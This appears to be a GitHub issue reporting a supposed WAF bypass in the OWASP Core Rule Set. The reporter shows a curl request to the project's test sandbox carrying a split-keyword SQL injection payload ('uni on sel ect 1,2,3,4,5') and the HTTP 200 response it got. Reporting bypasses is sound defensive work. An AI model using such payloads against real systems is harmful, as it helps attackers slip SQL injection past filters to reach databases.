SQL Injection bypass WAF #4191
Description
Hello, world i try payload uni on sel ect 1,2,3,4,5 with Paranoia level 3 i see 200 i try with
curl -ig -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level: 3" -H "x-backend: coraza-caddy" --data-urlencode "q=uni on sel ect 1,2,3,4,5" "https://sandbox.coreruleset.org/"HTTP/1.1 200 OK
Date: Wed, 09 Jul 2025 10:42:22 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
X-Unique-ID: aG5Hjg3ZsEJGA-19Uz88PAAAANY
x-backend: invalid, fallback to apache-latest
x-crs-last-commit: none
Impact of this can be attacker bypass waf and exploit SQL Injection